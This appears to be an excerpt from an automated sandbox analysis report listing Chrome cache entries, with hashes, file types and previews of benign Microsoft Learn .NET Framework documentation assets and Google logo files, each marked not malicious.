ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),vR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(vR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 587

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 588

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 589

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 590

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33019), with no line terminators
Category:	dropped
Size (bytes):	33019
Entropy (8bit):	4.916265462750225
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUcF:5hOEO8chkMet7pCjBfcHkWOzUcF
MD5:	17339002B4DE90FC5EA0710CA49160CA
SHA1:	AE771FFC398F8FA8C934FF05A9EBD6CB6D14BA9C
SHA-256:	D81C792435B93CBAA9A54F59D538121D2EE33B4446359A31D3998D769341F555
SHA-512:	15127FD515FD2CD55634EEDA71C4F2C96980E6FC51D169771484169104924A176D9387D792D08C7623AC3A44BCF9A00D2DADD6040417892ADB4A542C47B18F2C
Malicious:	false
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 591

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 592

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	464328
Entropy (8bit):	5.074713794508617
Encrypted:	false
SSDEEP:	6144:XegPrWKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:4KCerXyUh
MD5:	580CA9CBC6918A8A9556F1D090B74FE8
SHA1:	DDE89F9D1EDBB515EAD0ECF0187F94F91BB3BDE3
SHA-256:	85C31640F600486A40FB632CB495CA11CC730B5BA36553C4B9B07EF52834A493
SHA-512:	373D40D7E0C1FA02BEF1B508FA7BFF171C5B589E8C0254DD48C01C785B40BC9C5E025ADC76146CD176C293483E469383FB5F023F559A7AA82D13517AFB4A46AF
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.028696169/styles/site-ltr.css
Preview:	.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

Chrome Cache Entry: 593

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 594

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	4897
Entropy (8bit):	4.794639101874543
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzVqrpCvJ4QG63JjJ+do88HxbqP:dgQ+KfZcbhaWjp45qtAdflfDOFnNgBy4
MD5:	84E6C95F0E5378BDA94FA965C4692FAF
SHA1:	7C1D6572906509B08F8CD7B7A33EB9F9697EE6D1
SHA-256:	88A4A7B4F1160F8CAD3EB835116C29AC39659D586D4DADC54D9E40AC7E1BC610
SHA-512:	D34BFF37F8402B4A1FEE3C26F247A86D72666647A10E83D711A1BED1D24C6FC13674D65DCC037C22811B227FEC34B5DE20442191A42F9D78FC79D55FD5792761
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 595

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTthb_7uL8fi0CBKDba3xi6R0PUU9w"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 596

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 597

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 598

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
Category:	downloaded
Size (bytes):	33370
Entropy (8bit):	7.973675198531228
Encrypted:	false
SSDEEP:	768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
MD5:	6E78EE324E008296108BFCDECD77E318
SHA1:	F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
SHA-256:	EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
SHA-512:	BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/event-banners/banner-ignite-2024.jpg
Preview:	......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A.$"3!h.~`>.....d+.,.a).Rb.I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.\|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..\|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..

Chrome Cache Entry: 599

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Chrome Cache Entry: 600

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:	downloaded
Size (bytes):	19696
Entropy (8bit):	7.9898910353479335
Encrypted:	false
SSDEEP:	384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:	4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:	F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:	67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:	9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.028696169/styles/docons.c731eaf.34a85e0c.woff2
Preview:	wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t..........3..C..?u....E.S$.:.....mfZ......... .Q...].y..@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V...=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.\|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......\|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.\|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.\|49.......]

Chrome Cache Entry: 601

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1478
Entropy (8bit):	5.030941252322257
Encrypted:	false
SSDEEP:	24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
MD5:	020629EBA820F2E09D8CDA1A753C032B
SHA1:	D91A65036E4C36B07AE3641E32F23F8DD616BD17
SHA-256:	F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
SHA-512:	EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
Malicious:	false
Preview:	// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..

Chrome Cache Entry: 602

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/logos/logo_net.svg
